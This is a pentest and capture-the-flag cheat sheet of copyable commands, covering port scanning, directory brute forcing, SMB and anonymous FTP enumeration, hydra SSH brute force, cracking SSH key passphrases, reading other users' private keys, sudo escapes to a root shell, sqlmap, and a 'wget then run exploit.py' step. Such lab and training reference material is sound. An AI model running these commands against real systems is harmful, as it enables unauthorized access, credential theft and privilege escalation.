✓ COPIED

Pentest Commands

// Click any command block to copy it
Attack Flow
Standard Methodology
SCAN
ENUMERATE
FIND CREDS
LOGIN
EXPLORE
PRIVESC
ROOT FLAG
Reconnaissance
nmap — Port Scanning
⎘ COPY
Basic scan
nmap -sV -sC <IP>
Scans common ports, detects versions, runs default scripts.
⎘ COPY
All ports
nmap -p- <IP>
Scans all 65535 ports. Finds services on non-standard ports.
⎘ COPY
Port range + only open
nmap -p 1-1000 --open <IP>
⎘ COPY
Full combo + save
nmap -sV -sC -p- -A -oN results.txt <IP>
-sVDetect service versions
-sCRun default scripts
-p-Scan ALL 65535 ports
-AAggressive: OS + scripts
--openShow only open ports
-oNSave output to file
gobuster — Directory Bruteforce
⎘ COPY
Basic
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirb/common.txt
⎘ COPY
With extensions
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirb/common.txt -x php,txt,html
⎘ COPY
Custom port
gobuster dir -u http://<IP>:8080 -w /usr/share/wordlists/dirb/common.txt
Finds hidden directories. Try both port 80 and 8080 if one fails.
-uTarget URL
-wWordlist path
-xFile extensions
-t 50Thread count (faster)
Enumeration
enum4linux — SMB
⎘ COPY enum4linux <IP>
Extracts usernames, shares, OS info from SMB (139/445). Look for Unix usernames — use them for SSH brute force.
⎘ COPY
List shares manually
smbclient -L //<IP> -N
FTP — Anonymous Login
⎘ COPY ftp <IP>
Username: anonymous — password: just press Enter.
⎘ COPY
Inside FTP
passive ls cd pub get file.txt quit
⚠ If ls hangs type passive to toggle mode
Password Attacks
hydra — Brute Force SSH
⎘ COPY
Port 22
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP>
⎘ COPY
Custom port
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP> -s 2222 -t 4
⎘ COPY
Unzip rockyou if needed
gunzip /usr/share/wordlists/rockyou.txt.gz
-lSingle username
-LUsername list file
-PPassword wordlist
-sCustom port
-t 4Threads
john — Crack Key Passphrase
⎘ COPY
Convert SSH key to hash
ssh2john key_rsa > hash.txt
⎘ COPY
Crack hash
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
For SSH private keys protected by a passphrase. Run on local machine.
⚠ Fix permissions first: chmod 600 key_rsa
Initial Access
SSH — Login
⎘ COPY
Password
ssh <user>@<IP>
⎘ COPY
Custom port
ssh <user>@<IP> -p 2222
⎘ COPY
Private key
chmod 600 key_rsa ssh -i key_rsa <user>@<IP>
Web — Check Before Brute
robots.txtOften contains passwords or hints
Page sourceCtrl+U — look for hidden usernames
HTML comments<!-- hidden info -->
/assets/Config files or backups
⎘ COPY
Read robots.txt
curl http://<IP>/robots.txt
Privilege Escalation
Recon — Once Inside
⎘ COPY
Check sudo permissions
sudo -l
Most important command after login. Shows what you can run as root.
⎘ COPY
SUID binaries
find / -perm -4000 2>/dev/null
⎘ COPY
Check other users' SSH keys
ls /home ls -la /home/<user>/.ssh/ cat /home/<user>/.ssh/id_rsa
Readable id_rsa = instant access as that user.
Escape to Root Shell
⎘ COPY
vim
sudo vim -c ':!/bin/bash'
⎘ COPY
python3
sudo python3 -c 'import os; os.system("/bin/bash")'
⎘ COPY
find
sudo find / -exec /bin/bash \;
⎘ COPY
less
sudo less /etc/passwd # then type: !/bin/bash
gtfobins.github.io — search any binary for abuse method
CVEs & Exploits
searchsploit
⎘ COPY
Search
searchsploit <service> <version>
⎘ COPY
Copy to current dir
searchsploit -m <path/to/exploit>
⎘ COPY
Download and run
wget <URL> python3 exploit.py -u http://<IP>/
Notable CVEs
CVE-2020-1938 Ghostcat — AJP port 8009, Tomcat < 9.0.31. File read/RCE
CVE-2017-5638 Apache Struts REST RCE. Struts 2.5 < 2.5.16
CVE-2019-9053 CMS Made Simple — blind time-based SQLi
CVE-2021-4034 PwnKit — pkexec privesc to root
Misc
One-liners
⎘ COPY
Read file without cat
less file.txt tac file.txt grep . file.txt strings file.txt
⎘ COPY
Find file by name
find / -name "*.txt" 2>/dev/null find / -name shadow 2>/dev/null
⎘ COPY
sqlmap
sqlmap -u "http://<IP>/page?id=1" --dbs
⎘ COPY
Current user
whoami id
⎘ COPY
Command history
history
⎘ COPY
Install pip package
pip install <package> --break-system-packages